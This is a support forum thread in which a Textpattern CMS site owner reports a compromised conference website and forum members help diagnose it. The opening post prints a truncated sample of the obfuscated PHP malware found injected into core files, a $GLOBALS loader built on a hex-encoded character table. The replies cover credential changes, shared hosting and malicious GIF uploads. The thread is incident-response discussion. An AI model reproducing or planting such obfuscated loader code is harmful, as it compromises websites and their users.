Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
#1 2016-01-26 09:07:17
- mario.paolucci
- New Member
- Registered: 2016-01-26
- Posts: 8
Hacked website
Hello all,
I run a Textpattern version: 4.5.7 (r5900) for a conference. All of a sudden I started to get weird error messages. The diagnostics say that textpattern files have been modified; opening them revealed some weird GLOBALS code insertion (example below) and some new strange files (example: general.php.suspected).
I have saved the whole structure for reference, then replaced all the modified files with clean ones. Of course this doesn’t address the vulnerability. What do you think, is this likely to be a security problem in my installation, or rather a security problem in the server machine?
I had removed the setup dir, just after install, and checked for writable directories, but not much more than that.. suggestions and comments welcome.
<?php $GLOBALS['ldc74582'];global$ldc74582;$ldc74582=$GLOBALS;$ldc74582['j709a']="\x7b\x3b\x70\x4c\x67\x45\x7d\x76\x59\xa\x2c\x3c\x28\x65\x38\x24\x48\x6c\x20\x42\x60\x5f\x34\x9\x5e\x52\x63\x74\x26\x3d\x30\x4b\x64\x77\x23\x47\x44\x71\x22\x2b\x69\x5d\x37\x5b\x58\x78\x4f\x25\x33\x21\x6d\x54\x50\x4a\x3f\x29\x72\x4d\x31\x4e\x57\x36\xd\x6e\x53\x41\x51\x7e\x5a\x6a\x43\x40\x62\x7c\x6b\x61\x7a\x2f\x79\x55\x66\x46\x27\x6f\x3e\x32\x5c\x56\x68\x75\x2a\x2d\x3a\x73\x39\x35\x2e\x49";$ldc74582[$ldc74582['j709a'][Offline
Re: Hacked website
Hi Mario and welcome to txp forum
Do you have any other installations in your server (wordpress, stats software, forum)? Also, are you in a shared server?
I don’t know if you did already but you should also change the user names and passwords for ftp, webmin, mysql, txp install etc.
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
#3 2016-01-26 10:07:58
- mario.paolucci
- New Member
- Registered: 2016-01-26
- Posts: 8
Re: Hacked website
Thanks for your answer. Yes, the server is shared. I have requested a password change to the admin. No other installation on my user (but some directory are group writable).
Is this kind of exploit common? Anything else I should “clean”?
Offline
Re: Hacked website
mario.paolucci wrote #297588:
Thanks for your answer. Yes, the server is shared. I have requested a password change to the admin. No other installation on my user (but some directory are group writable).
Is this kind of exploit common? Anything else I should “clean”?
Txp has a very low percentage of sites being hacked and it is normally due to other installs in the server or from vulnerabilities to the server setup and other sites in shared hosting environment.
One of our developers will possibly respond to this and offer more professional advice.
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
Re: Hacked website
Which version of PHP do you use?
Offline
Re: Hacked website
Did you by any chance save copies of the modified files?
Do you have the ‘last modified’ timestamps of those files?
If so, does anything weird show up in the server log files at that time?
Offline
#7 2016-01-27 09:54:53
- mario.paolucci
- New Member
- Registered: 2016-01-26
- Posts: 8
Re: Hacked website
Thanks all for your attention! PHP version is 5.3.3. I have a complete copy of all the hacked files Two kinds, modified textpattern files:
publish.php
And just new files:
javascript98.php
I can share the zip if there is a forensic interest on them. I don’t run the machine and don’t have access to the logs.. For the php version and other details I attach the diagnostics:
.bc
Textpattern version: 4.5.7 (r5900)
Last update: 2015-09-17 16:10:24/2016-01-26 08:33:42
Document root:
$path_to_site:
Textpattern path:
Permanent link mode: section_id_title
upload_tmp_dir: /tmp
Temporary directory path:
Site URL: www.ssc2016.cnr.it
PHP version: 5.3.3
GD Graphics Library: bundled (2.0.34 compatible); supported formats: GIF, JPG, PNG.
Server TZ: America/Los_Angeles
Server local time: 2016-01-27 01:23:58
DST enabled?: 0
Automatically adjust DST setting?: 0
Time zone: Europe/Rome (3600)
MySQL: 5.1.73
Locale: en_GB.UTF-8
Server: Apache
Apache version: Apache
PHP server API: apache2handler
RFC 2616 headers:
Server OS: Linux 2.6.32-573.12.1.el6.x86_64
Active plugins: adi_menu-1.3.1
Admin-side theme: classic 4.5.7
Offline
Re: Hacked website
I can’t figure out the first one, but the second one for the most part is an SMTP library and appears to be used to send email. Not sure if it attaches local files or uploaded files.
Without log files, I don’t think there’s much to investigate. Do you have logs in TXP enabled? Do they show anything unusual?
Offline
Re: Hacked website
one thing comes to mind. has anyone upload a .gif somewhere into your file space? i had a malicious giff that was once placed into my /public_html/ directory which was a virus.
…. texted postive
Offline
#10 2016-01-28 14:32:11
- mario.paolucci
- New Member
- Registered: 2016-01-26
- Posts: 8
Re: Hacked website
Thank you bici!
I went looking for GIFs and I found a whole directory – created today – full of them, under user 48, not me.
That definitely points in the direction of a cause other from anything texpattern as far as I understand.
I thank you all for your support and attention, and I guess the case can be closed.
Best
MarioOffline
Re: Hacked website
mario.paolucci wrote #297601:
Thank you bici!
I went looking for GIFs and I found a whole directory – created today – full of them, under user 48, not me.
That definitely points in the direction of a cause other from anything texpattern as far as I understand.
I thank you all for your support and attention, and I guess the case can be closed.
Best
check with your ISP to see if there is a security issue with access. Also if you use any php scripts that is how they get in.
…. texted postive
Offline
Re: Hacked website
I’d recommend switching to a different hosting company. One that knows how to correctly setup a webserver so one hacked account doesn’t affect all the other customers on the server.
Offline